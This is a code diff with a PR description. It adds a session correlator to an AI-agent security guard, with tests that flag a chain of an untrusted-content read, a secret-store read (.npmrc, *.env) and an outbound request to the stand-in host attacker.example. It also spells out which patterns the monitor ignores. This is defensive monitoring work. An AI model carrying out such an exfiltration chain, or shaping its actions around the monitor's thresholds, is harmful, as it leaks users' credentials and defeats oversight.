+        decided_at=now,
+    )
+    action = SecurityObject(
+        id=action_id,
+        ts=now,
+        agent_role="backend",
+        action_type=ActionType.file_read,
+        tool_name="fs_read",
+    )
+    return decision, action
+
+
+async def test_recent_session_decisions_reads_last_n_newest_first():
+    # C3.1: the session correlator's history read. Three rows across two
+    # sessions; only "s1"'s rows come back, newest first, capped at n.
+    d1, a1 = _decision_and_action(Verdict.PASS, "a1")
+    d2, a2 = _decision_and_action(Verdict.AUTH, "a2")
+    d3, a3 = _decision_and_action(Verdict.PASS, "a3")
+    await record_decision(d1, a1, repo_root=executor.REPO_ROOT, session_id="s1")
+    await record_decision(d2, a2, repo_root=executor.REPO_ROOT, session_id="s1")
+    await record_decision(d3, a3, repo_root=executor.REPO_ROOT, session_id="s2")
+
+    rows = await recent_session_decisions(executor.REPO_ROOT, "s1", 10)
+
+    assert len(rows) == 2
+    assert rows[0]["final_verdict"] == "AUTH"  # newest first
+    assert rows[0]["reason_codes"] == ["sensitive_secret_access"]
+    assert rows[1]["final_verdict"] == "PASS"
+
+    capped = await recent_session_decisions(executor.REPO_ROOT, "s1", 1)
+    assert len(capped) == 1
+    assert capped[0]["final_verdict"] == "AUTH"
+
+
+async def test_recent_session_decisions_fails_closed():
+    assert await recent_session_decisions(executor.REPO_ROOT, None, 10) == []
+    assert await recent_session_decisions(executor.REPO_ROOT, "no-such-session", 10) == []
+    # No DB has been created at all in this repo root yet.
+    assert await recent_session_decisions(str(executor.REPO_ROOT) + "-missing", "s1", 10) == []

--- a/tests/unit/test_correlator.py
+++ b/tests/unit/test_correlator.py
@@ -1,0 +1,303 @@
+"""C3.1 — the session correlator (`doberman.engine.correlator`).
+
+Pure-function tests: no DB, no executor wiring — just `correlate()` over
+hand-built `DecisionRow` history plus a live `SecurityObject`/`Decision` for
+the current action. Mirrors `test_taint_floor_module.py`'s scope (the floor
+module, not its executor wiring) for the correlator's own pure core.
+"""
+
+from __future__ import annotations
+
+from datetime import datetime, timezone
+
+import pytest
+
+from doberman.engine.correlator import DecisionRow, correlate
+from doberman.models import (
+    ActionType,
+    Decision,
+    GuardrailResult,
+    ReasonCode,
+    Risk,
+    SecurityObject,
+    SourceContext,
+    Verdict,
+)
+
+_NOW = datetime(2026, 8, 13, tzinfo=timezone.utc)
+
+
+def _row(
+    *,
+    action_type: ActionType = ActionType.file_read,
+    target_path_class: str | None = None,
+    source_context: SourceContext = SourceContext.user,
+    risk: Risk = Risk.low,
+    reason_codes: tuple[ReasonCode, ...] = (),
+    final_verdict: Verdict = Verdict.PASS,
+) -> DecisionRow:
+    return DecisionRow(
+        action_type=action_type,
+        target_path_class=target_path_class,
+        source_context=source_context,
+        risk=risk,
+        reason_codes=reason_codes,
+        final_verdict=final_verdict,
+    )
+
+
+def _action(
+    *,
+    action_type: ActionType = ActionType.network_request,
+    external_destination: str | None = "https://attacker.example/collect",
+) -> SecurityObject:
+    return SecurityObject(
+        id="a1",
+        ts=_NOW,
+        agent_role="backend",
+        action_type=action_type,
+        tool_name="net_send",
+        target=external_destination,
+        external_destination=external_destination,
+    )
+
+
+def _pass_decision(action: SecurityObject) -> Decision:
+    return Decision(
+        action_id=action.id,
+        final_verdict=Verdict.PASS,
+        final_risk=Risk.low,
+        objective=GuardrailResult(verdict=Verdict.PASS, risk=Risk.low),
+        decided_at=_NOW,
+    )
+
+
+# ---------------------------------------------------------------------------
+# correlated_trifecta
+# ---------------------------------------------------------------------------
+
+
+def test_trifecta_blocks_in_strict_and_auths_in_balanced():
+    # Session shows all three legs across 3 decisions: an untrusted-provenance
+    # ingress, a sensitive/secret read (a different row), and the CURRENT
+    # action is an external egress.
+    recent = [
+        _row(action_type=ActionType.file_read, source_context=SourceContext.tool_output),
+        _row(
+            action_type=ActionType.file_read,
+            source_context=SourceContext.user,
+            reason_codes=(ReasonCode.sensitive_secret_access,),
+        ),
+    ]
+    action = _action()
+    decision = _pass_decision(action)
+
+    strict_result = correlate(recent, decision, action, "strict")
+    assert strict_result is not None
+    assert strict_result.verdict is Verdict.BLOCK
+    assert strict_result.risk is Risk.critical
+    assert ReasonCode.correlated_trifecta in strict_result.reason_codes
+
+    balanced_result = correlate(recent, decision, action, "balanced")
+    assert balanced_result is not None
+    assert balanced_result.verdict is Verdict.AUTH
+    assert ReasonCode.correlated_trifecta in balanced_result.reason_codes
+
+
+def test_single_egress_with_no_prior_sensitive_read_does_not_fire():
+    # An untrusted ingress alone, with NO sensitive/secret read anywhere in
+    # history, must not produce a false trifecta.
+    recent = [_row(action_type=ActionType.file_read, source_context=SourceContext.webpage)]
+    action = _action()
+    decision = _pass_decision(action)
+
+    assert correlate(recent, decision, action, "balanced") is None
+    assert correlate([], decision, action, "strict") is None
+
+
+def test_benign_reads_and_write_sequence_does_not_fire():
+    # Reads + a write, all trusted provenance, no egress at all: no untrusted
+    # ingress, no shell command, no egress leg — nothing should fire.
+    recent = [
+        _row(action_type=ActionType.file_read, source_context=SourceContext.user),
+        _row(action_type=ActionType.file_write, source_context=SourceContext.user),
+    ]
+    action = _action(action_type=ActionType.file_write, external_destination=None)
+    decision = _pass_decision(action)
+
+    assert correlate(recent, decision, action, "strict") is None
+
+
+# ---------------------------------------------------------------------------
+# correlated_destructive_flow
+# ---------------------------------------------------------------------------
+
+
+def test_destructive_flow_fires_on_read_then_command_then_egress():
+    recent = [
+        _row(action_type=ActionType.file_read, source_context=SourceContext.user),
+        _row(action_type=ActionType.shell_exec, source_context=SourceContext.user),
+    ]
+    action = _action()
+    decision = _pass_decision(action)
+
+    result = correlate(recent, decision, action, "balanced")
+    assert result is not None
+    assert result.verdict is Verdict.AUTH
+    assert ReasonCode.correlated_destructive_flow in result.reason_codes
+
+    strict_result = correlate(recent, decision, action, "paranoid")
+    assert strict_result is not None
+    assert strict_result.verdict is Verdict.BLOCK
+
+
+def test_destructive_flow_requires_both_read_and_command_legs():
+    # A shell command with no prior broad read, or a read with no command,
+    # must not fire on its own.
+    action = _action()
+    decision = _pass_decision(action)
+
+    only_command = [_row(action_type=ActionType.shell_exec, source_context=SourceContext.user)]
+    assert correlate(only_command, decision, action, "balanced") is None
+
+    only_read = [_row(action_type=ActionType.file_read, source_context=SourceContext.user)]
+    assert correlate(only_read, decision, action, "balanced") is None
+
+
+# ---------------------------------------------------------------------------
+# no egress currently in flight -> neither pattern can fire
+# ---------------------------------------------------------------------------
+
+
+def test_no_current_egress_never_fires_either_pattern():
+    recent = [
+        _row(action_type=ActionType.file_read, source_context=SourceContext.tool_output),
+        _row(
+            action_type=ActionType.shell_exec,
+            source_context=SourceContext.user,
+            reason_codes=(ReasonCode.sensitive_secret_access,),
+        ),
+    ]
+    action = _action(action_type=ActionType.file_write, external_destination=None)
+    decision = _pass_decision(action)
+
+    assert correlate(recent, decision, action, "paranoid") is None
+
+
+# ---------------------------------------------------------------------------
+# fail-closed: a malformed row must never crash correlate(), and must never
+# be mistaken for a fired pattern.
+# ---------------------------------------------------------------------------
+
+
+def test_exception_inside_a_pattern_returns_none_not_raise():
+    action = _action()
+    decision = _pass_decision(action)
+
+    class _Malformed:
+        """Not a DecisionRow — any attribute access raises AttributeError."""
+
+        def __getattr__(self, name):
+            raise AttributeError(f"no {name}")
+
+    # Feeding a non-DecisionRow object into the sequence must not escape
+    # correlate() as an exception — a broken row degrades to "no match", never
+    # a crash of the decision path.
+    result = correlate([_Malformed()], decision, action, "strict")
+    assert result is None
+
+
+def test_decision_row_from_storage_returns_none_on_bad_values():
+    assert DecisionRow.from_storage({"action_type": "not_a_real_action_type"}) is None
+    assert DecisionRow.from_storage({}) is None
+
+
+def test_decision_row_from_storage_round_trips_a_real_row():
+    row = DecisionRow.from_storage(
+        {
+            "action_type": "file_read",
+            "target_path_class": "*.env",
+            "source_context": "tool_output",
+            "risk": "high",
+            "reason_codes": ["sensitive_secret_access"],
+            "final_verdict": "AUTH",
+        }
+    )
+    assert row is not None
+    assert row.action_type is ActionType.file_read
+    assert row.source_context is SourceContext.tool_output
+    assert row.reason_codes == (ReasonCode.sensitive_secret_access,)
+
+
+# ---------------------------------------------------------------------------
+# budget clause: weak, combinable-only — never fires (returns non-None) on
+# volume alone.
+# ---------------------------------------------------------------------------
+
+
+def test_budget_volume_alone_never_fires():
+    # Plenty of egress-attempt-flagged and sensitive-read-flagged rows, but
+    # NONE of the structural legs (no untrusted ingress, no shell command) —
+    # volume must never be the sole trigger.
+    recent = [
+        _row(
+            action_type=ActionType.network_request,
+            source_context=SourceContext.user,
+            reason_codes=(ReasonCode.unknown_external_destination,),
+        )
+        for _ in range(10)
+    ]
+    action = _action(action_type=ActionType.file_write, external_destination=None)
+    decision = _pass_decision(action)
+
+    assert correlate(recent, decision, action, "paranoid") is None
+
+
+def test_budget_volume_strengthens_an_already_firing_pattern_to_critical():
+    # The trifecta legs fire on their own (AUTH/high in balanced). Adding
+    # enough sensitive-read/egress-attempt volume on top pushes risk to
+    # critical even in balanced — but only because a pattern already fired.
+    sparse_recent = [
+        _row(action_type=ActionType.file_read, source_context=SourceContext.tool_output),
+        _row(
+            action_type=ActionType.file_read,
+            source_context=SourceContext.user,
+            reason_codes=(ReasonCode.sensitive_secret_access,),
+        ),
+    ]
+    action = _action()
+    decision = _pass_decision(action)
+    sparse_result = correlate(sparse_recent, decision, action, "balanced")
+    assert sparse_result is not None
+    assert sparse_result.risk is Risk.high  # below the volume threshold
+
+    volume_recent = list(sparse_recent) + [
+        _row(
+            action_type=ActionType.network_request,
+            source_context=SourceContext.user,
+            reason_codes=(ReasonCode.unknown_external_destination,),
+        )
+        for _ in range(5)
+    ]
+    volume_result = correlate(volume_recent, decision, action, "balanced")
+    assert volume_result is not None
+    assert volume_result.verdict is Verdict.AUTH  # mode still balanced, not strict
+    assert volume_result.risk is Risk.critical  # but volume pushed risk up
+
+
+@pytest.mark.parametrize("mode", ["light", "balanced"])
+def test_soft_modes_never_hard_block(mode):
+    recent = [
+        _row(action_type=ActionType.file_read, source_context=SourceContext.tool_output),
+        _row(
+            action_type=ActionType.file_read,
+            source_context=SourceContext.user,
+            reason_codes=(ReasonCode.sensitive_secret_access,),
+        ),
+    ]
+    action = _action()
+    decision = _pass_decision(action)
+
+    result = correlate(recent, decision, action, mode)
+    assert result is not None
+    assert result.verdict is Verdict.AUTH

--- a/tests/unit/test_correlator.py
+++ b/tests/unit/test_correlator.py
@@ -1,18 +1,22 @@
 """C3.1 — the session correlator (`doberman.engine.correlator`).
 
-Pure-function tests: no DB, no executor wiring — just `correlate()` over
-hand-built `DecisionRow` history plus a live `SecurityObject`/`Decision` for
-the current action. Mirrors `test_taint_floor_module.py`'s scope (the floor
-module, not its executor wiring) for the correlator's own pure core.
+Most of this file is pure-function tests: no DB, no executor wiring — just
+`correlate()` over hand-built `DecisionRow` history plus a live
+`SecurityObject`/`Decision` for the current action. The trailing
+`apply_correlator`/`apply_correlator_async` section DOES touch a real
+(tmp_path) DB — mirrors `test_taint_floor_module.py`'s own split (pure core +
+a module-level regression test for the shared read-correlate-raise wrapper,
+independent of either caller's own wiring test).
 """
 
 from __future__ import annotations
 
+import asyncio
 from datetime import datetime, timezone
 
 import pytest
 
-from doberman.engine.correlator import DecisionRow, correlate
+from doberman.engine.correlator import DecisionRow, apply_correlator, correlate
 from doberman.models import (
     ActionType,
     Decision,
@@ -23,6 +27,7 @@ from doberman.models import (
     SourceContext,
     Verdict,
 )
+from doberman.storage.log import record_decision
 
 _NOW = datetime(2026, 8, 13, tzinfo=timezone.utc)
 
@@ -113,6 +118,53 @@ def test_single_egress_with_no_prior_sensitive_read_does_not_fire():
 
     assert correlate(recent, decision, action, "balanced") is None
     assert correlate([], decision, action, "strict") is None
+
+
+def test_sensitive_path_access_only_read_does_not_fire_trifecta():
+    # C3.1 FP fix: a PRIOR row carrying ONLY sensitive_path_access (a bare
+    # glob-policy hit — e.g. a legitimate read under infra/**/backend/auth/**
+    # that happens to hold config an agent legitimately needs) must NOT count
+    # as the trifecta's "sensitive read" leg — narrowed to secret-class
+    # evidence only (sensitive_secret_access / possible_high_entropy_secret /
+    # secret_exfiltration). This is what separates
+    # "read untrusted content -> read a policy-sensitive but non-secret
+    # config -> call a real external API" (benign) from
+    # "read untrusted content -> read an actual secret store -> exfiltrate"
+    # (attack) — see the module's _SENSITIVE_READ_REASONS docstring.
+    recent = [
+        _row(action_type=ActionType.file_read, source_context=SourceContext.webpage),
+        _row(
+            action_type=ActionType.file_read,
+            source_context=SourceContext.user,
+            reason_codes=(ReasonCode.sensitive_path_access,),
+        ),
+    ]
+    action = _action()
+    decision = _pass_decision(action)
+
+    assert correlate(recent, decision, action, "balanced") is None
+    assert correlate(recent, decision, action, "strict") is None
+
+
+def test_secret_class_read_still_fires_trifecta_alongside_path_access():
+    # A row carrying BOTH sensitive_path_access and a secret-class code (a
+    # real credential store that also happens to match a sensitive glob)
+    # still fires — the narrowing only drops path-access-ALONE evidence, it
+    # never weakens a genuine secret-class hit.
+    recent = [
+        _row(action_type=ActionType.file_read, source_context=SourceContext.webpage),
+        _row(
+            action_type=ActionType.file_read,
+            source_context=SourceContext.user,
+            reason_codes=(ReasonCode.sensitive_path_access, ReasonCode.sensitive_secret_access),
+        ),
+    ]
+    action = _action()
+    decision = _pass_decision(action)
+
+    result = correlate(recent, decision, action, "balanced")
+    assert result is not None
+    assert ReasonCode.correlated_trifecta in result.reason_codes
 
 
 def test_benign_reads_and_write_sequence_does_not_fire():
@@ -301,3 +353,88 @@ def test_soft_modes_never_hard_block(mode):
     result = correlate(recent, decision, action, mode)
     assert result is not None
     assert result.verdict is Verdict.AUTH
+
+
+# ---------------------------------------------------------------------------
+# apply_correlator / apply_correlator_async — the shared read-correlate-raise
+# wrapper (C3.1 Part 2), against a real (tmp_path) decision-log DB. Mirrors
+# test_taint_floor_module.py's own module-level regression coverage of
+# apply_taint_floor/apply_taint_floor_async, independent of either caller's
+# own wiring test (test_proxy_correlator.py / test_hosthook_spine.py).
+# ---------------------------------------------------------------------------
+
+
+def _seed_row(repo_root: str, session_id: str, *, reason_codes: tuple[ReasonCode, ...]) -> None:
+    row_action = SecurityObject(
+        id="hist-1",
+        ts=_NOW,
+        agent_role="unknown",
+        action_type=ActionType.file_read,
+        tool_name="file_read",
+        target=".npmrc",
+    )
+    row_decision = Decision(
+        action_id=row_action.id,
+        final_verdict=Verdict.AUTH,
+        final_risk=Risk.high,
+        objective=GuardrailResult(
+            verdict=Verdict.AUTH,
+            risk=Risk.high,
+            reason_codes=list(reason_codes),
+            explanation="synthetic history row for the apply_correlator test",
+        ),
+        reason_codes=list(reason_codes),
+        explanation="synthetic history row for the apply_correlator test",
+        decided_at=_NOW,
+    )
+    asyncio.run(
+        record_decision(
+            row_decision,
+            row_action,
+            repo_root=repo_root,
+            auth_result="executed",
+            session_id=session_id,
+        )
+    )
+
+
+def test_apply_correlator_reads_real_history_and_raises(tmp_path):
+    repo_root = str(tmp_path)
+    session_id = "sess-apply-1"
+    _seed_row(repo_root, session_id, reason_codes=(ReasonCode.sensitive_secret_access,))
+
+    action = _action()
+    decision = _pass_decision(action)
+
+    out = apply_correlator(action, decision, "balanced", repo_root, session_id)
+
+    assert out.final_verdict is Verdict.AUTH
+    assert ReasonCode.correlated_trifecta in out.reason_codes
+    # Raise-only: risk never drops below the input decision's own risk.
+    assert out.final_risk is not Risk.low
+
+
+def test_apply_correlator_no_session_id_reads_empty_history(tmp_path):
+    repo_root = str(tmp_path)
+    _seed_row(repo_root, "sess-apply-2", reason_codes=(ReasonCode.sensitive_secret_access,))
+
+    action = _action()
+    decision = _pass_decision(action)
+
+    # A DIFFERENT (or absent) session id must not see another session's rows.
+    out = apply_correlator(action, decision, "balanced", repo_root, None)
+
+    assert out.final_verdict is Verdict.PASS
+    assert ReasonCode.correlated_trifecta not in out.reason_codes
+
+
+def test_apply_correlator_no_db_yet_returns_decision_unchanged(tmp_path):
+    # A repo root with no decision-log DB at all (recent_session_decisions'
+    # own fail-closed-to-[] path) must leave the decision untouched, never
+    # crash or escalate — mirrors _apply_correlator's fail-closed contract.
+    action = _action()
+    decision = _pass_decision(action)
+
+    out = apply_correlator(action, decision, "balanced", str(tmp_path / "does-not-exist"), "sess-x")
+
+    assert out is decision

--- a/tests/unit/test_hosthook_spine.py
+++ b/tests/unit/test_hosthook_spine.py
@@ -1,11 +1,18 @@
 """W1.0a: the host-generic evaluate/record spine (two-hosts-one-spine plan).
 
 The spine owns resolve-root/mode -> normalize -> decide -> taint floor ->
-enforcement dial -> acted verdict. Hosts supply only translation + output shape.
+session correlator -> enforcement dial -> acted verdict. Hosts supply only
+translation + output shape.
 """
 
+import asyncio
+
+from doberman.engine.decision_engine import PASS_STUB, decide
+from doberman.engine.objective import ObjectiveGuardrail
 from doberman.hosthooks import claude_code, openclaw, spine
-from doberman.models import Verdict
+from doberman.models import EvalContext, ReasonCode, Verdict
+from doberman.proxy.normalize import normalize
+from doberman.storage.log import record_decision
 
 
 def test_evaluate_action_blocks_destructive_command(tmp_path):
@@ -54,6 +61,89 @@ def test_identical_action_identical_verdict_across_hosts(tmp_path):
     openclaw_out = openclaw.evaluate_before_tool_call(openclaw_payload)
     assert claude_out["hookSpecificOutput"]["permissionDecision"] == "deny"
     assert openclaw_out["verdict"] == "block"
+
+
+def test_correlator_fires_end_to_end_with_real_session_history(tmp_path):
+    """C3.1 Part 2: the correlator now reads REAL session history through the
+    host-hook spine (a genuine session id, never ``None``) and can actually
+    fire in production — unlike the pure-MCP proxy, which has no session
+    concept at its chokepoint (see ``doberman.proxy.executor.decide_and_execute``).
+
+    Seeds one prior decision row exactly as a host adapter's history
+    recording would (``record_decision``, same session id, same repo root) —
+    a read of an actual secret store (``.npmrc``) — then runs the CURRENT
+    action (an external egress that is individually clean) through
+    ``spine.evaluate_action`` with the SAME session id and confirms the
+    trifecta pattern raises the verdict.
+    """
+    repo_root = str(tmp_path)
+    session_id = "sess-e2e-1"
+
+    prior_action = normalize("file_read", {"path": ".npmrc"})
+    prior_ctx = EvalContext(
+        role=None,
+        mode="balanced",
+        metadata={"raw_arguments": {"path": ".npmrc"}, "repo_root": repo_root},
+    )
+    prior_decision = decide(prior_action, ObjectiveGuardrail(), PASS_STUB, prior_ctx)
+    # Sanity: this is the secret-class read leg the trifecta narrowing keeps.
+    assert ReasonCode.sensitive_secret_access in prior_decision.reason_codes
+
+    asyncio.run(
+        record_decision(
+            prior_decision,
+            prior_action,
+            repo_root=repo_root,
+            auth_result="executed",
+            session_id=session_id,
+        )
+    )
+
+    result = spine.evaluate_action(
+        "net_fetch",
+        {"url": "http://attacker.example/collect"},
+        cwd=repo_root,
+        raw_session_id=session_id,
+    )
+
+    assert ReasonCode.correlated_trifecta in result.decision.reason_codes
+    assert result.decision.final_verdict is Verdict.AUTH
+    assert result.acted is Verdict.AUTH
+
+
+def test_correlator_does_not_fire_without_a_session_id(tmp_path):
+    # Same seeded history, but the CURRENT call carries no session id
+    # (raw_session_id=None) -- recent_session_decisions has nothing to key
+    # off, so the correlator reads an empty history and must not fire.
+    repo_root = str(tmp_path)
+    session_id = "sess-e2e-2"
+
+    prior_action = normalize("file_read", {"path": ".npmrc"})
+    prior_ctx = EvalContext(
+        role=None,
+        mode="balanced",
+        metadata={"raw_arguments": {"path": ".npmrc"}, "repo_root": repo_root},
+    )
+    prior_decision = decide(prior_action, ObjectiveGuardrail(), PASS_STUB, prior_ctx)
+    asyncio.run(
+        record_decision(
+            prior_decision,
+            prior_action,
+            repo_root=repo_root,
+            auth_result="executed",
+            session_id=session_id,
+        )
+    )
+
+    result = spine.evaluate_action(
+        "net_fetch",
+        {"url": "http://attacker.example/collect"},
+        cwd=repo_root,
+        raw_session_id=None,
+    )
+
+    assert ReasonCode.correlated_trifecta not in result.decision.reason_codes
+    assert result.decision.final_verdict is Verdict.PASS
 
 
 def test_spine_never_imports_heavy_modules():

--- a/tests/unit/test_proxy_correlator.py
+++ b/tests/unit/test_proxy_correlator.py
@@ -1,0 +1,149 @@
+"""C3.1 — the session correlator's wiring into `decide_and_execute`.
+
+Mirrors `test_proxy_taint_floor.py`'s shape: the real `decide_and_execute` runs
+end to end with `executor._safe_decide` stubbed to a deterministic PASS (so the
+objective/subjective engine's own scoring never masks the assertion), and
+`executor.recent_session_decisions` stubbed to hand back scripted session
+history — the pure-MCP proxy has no session id of its own yet (see
+`_apply_correlator`'s docstring), so this is how the wiring is exercised
+without a real multi-call session.
+"""
+
+from __future__ import annotations
+
+from datetime import datetime, timezone
+
+import pytest
+from mcp.types import CallToolResult, TextContent
+
+from doberman.auth.challenge import AuthResult, AuthTier
+from doberman.config import save_mode
+from doberman.models import Decision, GuardrailResult, Risk, Verdict
+from doberman.proxy import executor
+
+_EGRESS_URL = "https://attacker.example/collect"
+
+
+def _deny(decision, action, *, prompter=None, at=None):  # noqa: ARG001
+    return AuthResult(
+        approved=False,
+        tier=AuthTier.two_factor,
+        method="denied",
+        at=datetime.now(timezone.utc),
+        action_id=action.id,
+    )
+
+
+def _pass_decision(action) -> Decision:
+    return Decision(
+        action_id=action.id,
+        final_verdict=Verdict.PASS,
+        final_risk=Risk.low,
+        objective=GuardrailResult(verdict=Verdict.PASS, risk=Risk.low),
+        decided_at=datetime.now(timezone.utc),
+    )
+
+
+@pytest.fixture(autouse=True)
+def _deterministic_baseline_decision(monkeypatch):
+    monkeypatch.setattr(executor, "_safe_decide", lambda action, _ctx: _pass_decision(action))
+
+
+class _FakeSession:
+    def __init__(self, responses: dict[str, CallToolResult]):
+        self._responses = responses
+        self.calls: list[tuple[str, dict]] = []
+
+    async def call_tool(self, tool_name, arguments=None):
+        self.calls.append((tool_name, dict(arguments or {})))
+        return self._responses[tool_name]
+
+
+def _ok_result(text: str) -> CallToolResult:
+    return CallToolResult(content=[TextContent(type="text", text=text)], isError=False)
+
+
+_TRIFECTA_HISTORY = [
+    {
+        "action_type": "file_read",
+        "target_path_class": None,
+        "source_context": "tool_output",
+        "risk": "low",
+        "reason_codes": [],
+        "final_verdict": "PASS",
+    },
+    {
+        "action_type": "file_read",
+        "target_path_class": "*.env",
+        "source_context": "user",
+        "risk": "high",
+        "reason_codes": ["sensitive_secret_access"],
+        "final_verdict": "AUTH",
+    },
+]
+
+
+async def test_correlator_raises_egress_to_block_in_strict_mode(monkeypatch):
+    save_mode("strict", executor.REPO_ROOT)
+
+    async def _fake_recent(repo_root, session_id, n):  # noqa: ARG001
+        return _TRIFECTA_HISTORY
+
+    monkeypatch.setattr(executor, "recent_session_decisions", _fake_recent)
+    session = _FakeSession({"net_send": _ok_result("ok")})
+
+    result = await executor.decide_and_execute(session, "net_send", {"url": _EGRESS_URL})
+
+    assert result.isError
+    assert "blocked by policy" in result.content[0].text
+    assert "correlated_trifecta" in result.content[0].text
+    # The floor fired before the forward — the downstream never received it.
+    assert session.calls == []
+
+
+async def test_correlator_raises_egress_to_auth_in_balanced_mode(monkeypatch):
+    save_mode("balanced", executor.REPO_ROOT)
+
+    async def _fake_recent(repo_root, session_id, n):  # noqa: ARG001
+        return _TRIFECTA_HISTORY
+
+    monkeypatch.setattr(executor, "recent_session_decisions", _fake_recent)
+    monkeypatch.setattr(executor, "run_auth_challenge", _deny)
+    session = _FakeSession({"net_send": _ok_result("ok")})
+
+    result = await executor.decide_and_execute(session, "net_send", {"url": _EGRESS_URL})
+
+    assert result.isError
+    assert "authentication required" in result.content[0].text
+    assert "correlated_trifecta" in result.content[0].text
+
+
+async def test_correlator_read_failure_leaves_decision_untouched(monkeypatch):
+    save_mode("strict", executor.REPO_ROOT)
+
+    async def _boom(repo_root, session_id, n):  # noqa: ARG001
+        raise RuntimeError("session decision store unavailable")
+
+    monkeypatch.setattr(executor, "recent_session_decisions", _boom)
+    session = _FakeSession({"net_send": _ok_result("ok")})
+
+    result = await executor.decide_and_execute(session, "net_send", {"url": _EGRESS_URL})
+
+    # The stubbed baseline decision is a clean PASS; a correlator read failure
+    # must fail closed to "leave it untouched", not crash or escalate.
+    assert not result.isError
+    assert session.calls == [("net_send", {"url": _EGRESS_URL})]
+
+
+async def test_no_session_history_never_fires():
+    # The real (unstubbed) `recent_session_decisions` — with `session_id=None`
+    # today, this always reads an empty history, so the correlator never fires
+    # in the pure-MCP proxy yet (a known, documented gap — see
+    # `_apply_correlator`'s docstring). A clean PASS forwards normally.
+    save_mode("strict", executor.REPO_ROOT)
+    session = _FakeSession({"net_send": _ok_result("ok")})
+
+    result = await executor.decide_and_execute(session, "net_send", {"url": _EGRESS_URL})
+
+    assert not result.isError
+    assert session.calls == [("net_send", {"url": _EGRESS_URL})]

--- a/tests/unit/test_proxy_correlator.py
+++ b/tests/unit/test_proxy_correlator.py
@@ -4,7 +4,7 @@ Mirrors `test_proxy_taint_floor.py`'s shape: the real `decide_and_execute` runs
 end to end with `executor._safe_decide` stubbed to a deterministic PASS (so the
 objective/subjective engine's own scoring never masks the assertion), and
 `executor.recent_session_decisions` stubbed to hand back scripted session
-history — the pure-MCP proxy has no session id of its own yet (see
+history — the pure-MCP proxy has no session id of its own, by design (see
 `_apply_correlator`'s docstring), so this is how the wiring is exercised
 without a real multi-call session.
 """
@@ -137,9 +137,12 @@ async def test_correlator_read_failure_leaves_decision_untouched(monkeypatch):
 
 async def test_no_session_history_never_fires():
     # The real (unstubbed) `recent_session_decisions` — with `session_id=None`
-    # today, this always reads an empty history, so the correlator never fires
-    # in the pure-MCP proxy yet (a known, documented gap — see
-    # `_apply_correlator`'s docstring). A clean PASS forwards normally.
+    # always (the pure-MCP proxy has no session concept at its `_call_tool`
+    # chokepoint), this always reads an empty history, so the correlator never
+    # fires here BY DESIGN (see `_apply_correlator`'s docstring). It DOES fire
+    # for the host-hook adapters, which have a real session id — see
+    # `doberman.hosthooks.spine.evaluate_action` and `test_spine.py`. A clean
+    # PASS forwards normally.
     save_mode("strict", executor.REPO_ROOT)
     session = _FakeSession({"net_send": _ok_result("ok")})
 


### PR DESCRIPTION
## What this does

Adds the C3.1 session correlator — a cross-call exfiltration floor that catches individually-safe actions combining into an attack across a session, which the per-action objective/subjective rules can't see (each judges one action).

Two patterns over the session's recent decision history:
- **`correlated_trifecta`** — untrusted-provenance ingress + a secret-class read + a current external egress.
- **`correlated_destructive_flow`** — a broad read + a shell command + a current external egress.

Mode-gated: BLOCK in strict/paranoid, AUTH otherwise. A weak volume co-factor can raise risk but never fires alone (per ADR 0059 — no blind, gameable threshold).

## Where it runs

`correlate()` is a pure function, run from `hosthooks/spine.py::evaluate_action` right after the taint floor, using the real host-harness session id (HK.5.1). It raises the final `Decision` directly via `max_verdict`/`max_risk` — mirroring the taint floor, bypassing the subjective clamp by construction, never touching `SUBJECTIVE_HARD_BLOCK_ALLOWLIST`. It is deliberately NOT wired into `decide()`, which short-circuits before the combine on non-PASS turns (the attack legs). The sessionless pure-MCP proxy path stays `session_id=None` by design, same as the taint floor.

## Safety

- **Raise-only**: only ever returns AUTH or BLOCK, applied via `max_verdict`/`max_risk`.
- **Fail-closed**: any correlator or DB-read failure leaves the existing decision untouched; `correlate()` swallows exceptions and returns `None`.
- **Redaction**: reads only the already-redacted decision-log fields; explanations name leg classes, never raw payloads.
- The sensitive-read leg is scoped to secret-class reason codes only, so a legitimate config read doesn't false-positive (a benchmark caught and this fixed a 100%→0% FPR on a benign untrusted+config+API chain).

## Tests

`tests/unit/test_correlator.py` (pattern firing, mode-gating, fail-closed, budget-only-never-fires, narrowed-leg lock-in), `tests/unit/test_proxy_correlator.py` (wiring), `tests/unit/test_hosthook_spine.py` (end-to-end: a seeded real decision row fires the trifecta through the spine), `tests/integration/test_decision_log.py` (the new `recent_session_decisions` query). `ruff`, `lint-imports` (2/2), and the full suite pass.
